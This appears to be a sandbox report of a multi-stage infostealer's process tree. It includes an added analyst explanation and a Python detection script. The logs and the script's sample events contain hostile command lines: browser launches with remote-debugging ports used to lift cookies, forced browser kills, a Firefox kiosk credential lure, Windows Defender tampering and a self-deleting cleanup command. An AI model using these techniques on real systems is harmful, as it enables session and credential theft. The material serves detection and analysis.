  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe  (depth 5, PID 6924)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe  (depth 5, PID 6940)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 2868)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 1504)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6848,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 5524)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 5348)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6952,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 6160)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7116,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 6180)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7292,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7304 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 6360)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7452,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 4388)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7480,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7468 /prefetch:8
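The launches worth attention in this tree are the two started directly by the dropped stage 74957b3341.exe: chrome.exe and msedge.exe with --remote-debugging-port=9229 and an empty --profile-directory. That flag exposes the DevTools protocol on localhost, which lets the caller read cookies and session data out of the live browser instead of the encrypted on-disk stores; every renderer and utility child inherits the flag, which is why the sandbox tags so many processes. Further down the tree, d0fba8cbde.exe force-kills Firefox, Chrome, Edge, Opera and Brave with taskkill and relaunches Firefox in --kiosk mode on a youtube.com URL whose query string carries a Google sign-in path, a full-screen credential prompt the user cannot easily dismiss. The cmd.exe entry with timeout /t 11 followed by rd /s /q "C:\ProgramData\gdjmg" is the delayed clean-up of a staging directory.

What follows is an added detection example written for this page; it is not part of the sandbox report or of any vendor's rule set. It models process-creation telemetry as (pid, ppid, image, cmdline) tuples, a constructed format, and the sample events are built from the command lines shown in the tree. The image loader.exe and the parent pids 900 and 1000 are placeholders for the loader stages that fall outside this section and are not values from the report.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # pid, parent pid, image path, raw cmdline
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
CLEANUP_RE = re.compile(r"timeout\s+/t\s+\d+.*?&\s*(rd|rmdir)\s+/s\s+/q", re.I)

def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping double-quoted arguments whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline)]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def flag_value(args, name):
    """Value of a --name=value argument, or None when absent."""
    return next((a[len(name) + 1:] for a in args if a.startswith(name + "=")), None)

def rule_remote_debugging(ev, parent):
    # Renderer/GPU children inherit the flag but carry --type=...; only the
    # top-level launch, started by a non-browser, is worth an alert.
    args = split_cmdline(ev.cmdline)
    port = flag_value(args, "--remote-debugging-port")
    if basename(ev.image) not in BROWSERS or port is None or flag_value(args, "--type") is not None:
        return None
    if parent is not None and basename(parent.image) in BROWSERS:
        return None
    who = basename(parent.image) if parent else "unknown"
    return ("browser_remote_debugging", ev.pid, f"{basename(ev.image)} DevTools port {port} opened by {who}")

def rule_browser_taskkill(ev, parent):
    if basename(ev.image) != "taskkill.exe":
        return None
    args = [a.lower() for a in split_cmdline(ev.cmdline)]
    hit = [args[i + 1] for i, a in enumerate(args[:-1]) if a == "/im" and args[i + 1] in BROWSERS]
    return ("browser_force_kill", ev.pid, "forced kill of " + ", ".join(hit)) if hit and "/f" in args else None

def rule_kiosk_lure(ev, parent):
    # Firefox re-executes itself with identical arguments; report the outer launch only.
    args = split_cmdline(ev.cmdline)
    urls = [a for a in args if a.lower().startswith(("http://", "https://"))]
    if basename(ev.image) != "firefox.exe" or "--kiosk" not in args or not urls:
        return None
    if parent is not None and basename(parent.image) == "firefox.exe":
        return None
    nested = " (embeds a second URL)" if urls[0].count("://") > 1 else ""
    return ("kiosk_mode_lure", ev.pid, f"full-screen kiosk on {urls[0]}{nested}")

def rule_self_cleanup(ev, parent):
    if basename(ev.image) != "cmd.exe" or not CLEANUP_RE.search(ev.cmdline):
        return None
    return ("delayed_self_cleanup", ev.pid, "timeout then rd /s /q in one cmd.exe")

RULES = (rule_remote_debugging, rule_browser_taskkill, rule_kiosk_lure, rule_self_cleanup)

def evaluate(events):
    """Run every rule (event, parent-or-None) over every event; (rule, pid, detail) in event order."""
    by_pid = {e.pid: e for e in events}
    return [f for ev in events for rule in RULES if (f := rule(ev, by_pid.get(ev.ppid))) is not None]

def dropper_of(ev, by_pid, max_depth=64):
    """Nearest ancestor executing out of %TEMP%, i.e. the dropped stage to blame."""
    cur = by_pid.get(ev.ppid)
    for _ in range(max_depth):          # bounded walk guards against ppid cycles
        if cur is None or TEMP_RE.search(cur.image):
            return cur.pid if cur else None
        cur = by_pid.get(cur.ppid)
    return None

def chains(events):
    """Rule names grouped by the Temp-resident dropper responsible for them."""
    by_pid, grouped = {e.pid: e for e in events}, {}
    for rule, pid, _ in evaluate(events):
        d = dropper_of(by_pid[pid], by_pid)
        if d is not None:
            grouped.setdefault(d, set()).add(rule)
    return {pid: sorted(r) for pid, r in grouped.items()}

# Constructed sample modelled on the report's tree; loader.exe and the
# ppids 900 and 1000 are placeholders, not values from the report.
T = r"C:\Users\Admin\AppData\Local\Temp"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
LURE = "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd"
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, T + r"\loader.exe", f'"{T}\\loader.exe"'),
    ProcEvent(1192, 1000, T + r"\10361720101\74957b3341.exe", f'"{T}\\10361720101\\74957b3341.exe"'),
    ProcEvent(5020, 1192, CHROME, f'"{CHROME}" --remote-debugging-port=9229 --profile-directory=""'),
    ProcEvent(1636, 5020, CHROME, f'"{CHROME}" --type=renderer --remote-debugging-port=9229 --lang=en-US'),
    ProcEvent(3612, 1192, EDGE, f'"{EDGE}" --remote-debugging-port=9229 --profile-directory=""'),
    ProcEvent(2720, 1000, T + r"\10361730101\d0fba8cbde.exe", f'"{T}\\10361730101\\d0fba8cbde.exe"'),
    ProcEvent(4672, 2720, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM chrome.exe /T"),
    ProcEvent(5356, 2720, FIREFOX, f'"{FIREFOX}" --kiosk "{LURE}" --no-default-browser-check --disable-popup-blocking'),
    ProcEvent(1392, 5356, FIREFOX, f'"{FIREFOX}" --kiosk {LURE} --no-default-browser-check --disable-popup-blocking'),
    ProcEvent(4552, 1000, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gdjmg" & exit'),
]
```

The renderer entries are deliberately not alerted on: the flag only means something on the top-level launch, and alerting once per child buries the one event that matters. The same goes for the second Firefox process, which is Firefox re-executing itself with the arguments it was given. chains() attributes every hit to the nearest ancestor running out of %TEMP%, which groups the taskkill and the kiosk launch under d0fba8cbde.exe and both DevTools launches under 74957b3341.exe, the shape an analyst wants to see before reading any of the individual command lines.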
C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe  (depth 3, PID 2720)
  "C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

C:\Windows\SysWOW64\taskkill.exe  (depth 4, PID 2032)
  taskkill /F /IM firefox.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\taskkill.exe  (depth 4, PID 4672)
  taskkill /F /IM chrome.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\taskkill.exe  (depth 4, PID 4760)
  taskkill /F /IM msedge.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\taskkill.exe  (depth 4, PID 1084)
  taskkill /F /IM opera.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\taskkill.exe  (depth 4, PID 1584)
  taskkill /F /IM brave.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Program Files\Mozilla Firefox\firefox.exe  (depth 4, PID 5356)
  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 5, PID 1392)
  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
  - Drops desktop.ini file(s)
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 448)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {dfa8ddf3-6388-4fb5-8305-fc975c0ffd80} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 4060)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2488 -initialChannelId {fe2ed4d4-2274-4426-be52-aad97504815b} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 4500)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3812 -prefsLen 25164 -prefMapHandle 3816 -prefMapSize 270279 -jsInitHandle 3820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3828 -initialChannelId {0c680f5b-462d-401c-a062-4be186006a1c} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
  - Checks processor information in registry

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 5868)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27276 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {02409321-e47c-4e86-b0ce-1614a899a699} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 2804)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4556 -prefsLen 34775 -prefMapHandle 4560 -prefMapSize 270279 -jsInitHandle 4564 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4572 -initialChannelId {7488d36a-ed6e-4901-bb8f-86953182afd8} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
  - Checks processor information in registry

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6, PID 6204)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5140 -prefsLen 35012 -prefMapHandle 5144 -prefMapSize 270279 -ipcHandle 5152 -initialChannelId {bfac9f38-4f9e-4e9e-b1bd-f22b059223fb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
  - Checks processor information in registry

C:\Program Files\Mozilla Firefox\firefox.exe  (depth 6)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5440 -prefsLen 32952 -prefMapHandle 5444 -prefMapSize 270279 -jsInitHandle 5448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2668 -initialChannelId {03575e37-1941-4bfb-bcad-714bc7406ff1} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
  - Checks processor information in registry
PID:6464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5460 -prefsLen 32952 -prefMapHandle 5632 -prefMapSize 270279 -jsInitHandle 5636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {6b700fb6-a5c9-4db2-87e2-c59d9c8c4b00} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:6476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5816 -prefsLen 32952 -prefMapHandle 5820 -prefMapSize 270279 -jsInitHandle 5824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5832 -initialChannelId {b2ec3d06-7d44-4ae5-9081-372ae0a60dcf} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:6504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 18124 -prefsLen 36905 -prefMapHandle 10520 -prefMapSize 270279 -jsInitHandle 4908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3996 -initialChannelId {569a1635-aba0-4888-b5d3-e7f92f0ce90e} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab6⤵
- Checks processor information in registry
PID:10424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 19624 -prefsLen 36955 -prefMapHandle 19684 -prefMapSize 270279 -jsInitHandle 19524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3924 -initialChannelId {1dee40ed-4cc0-4363-9705-0ca6bc302ddb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab6⤵
- Checks processor information in registry
PID:14520
-
-
-
-
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe"
  - Modifies Windows Defender DisableAntiSpyware settings
  - Modifies Windows Defender Real-time Protection settings
  - Modifies Windows Defender TamperProtection settings
  - Modifies Windows Defender notification settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 1360
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 3416

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 7164
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 5416

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  PID: 2716

[depth 5] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
  - Uses browser remote debugging
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  PID: 3124

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffbfcfdcf8,0x7fffbfcfdd04,0x7fffbfcfdd10
  PID: 2884

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1780,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:3
  PID: 5812

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2116,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
  PID: 6880

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2396,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:2
  PID: 6424

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2804,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3124 /prefetch:1
  - Uses browser remote debugging
  PID: 6368

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2812,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
  - Uses browser remote debugging
  PID: 5432

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4012,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:2
  - Uses browser remote debugging
  PID: 6484

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4536,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:1
  - Uses browser remote debugging
  PID: 3920

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4984,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
  PID: 7036

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:8
  PID: 384

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:8
  PID: 2088

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5752,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:8
  PID: 4484

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5888,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8
  PID: 6944

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6048,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
  PID: 456

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4440,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:8
  PID: 13088

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3176,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:8
  PID: 13096

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6064,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:8
  PID: 13104

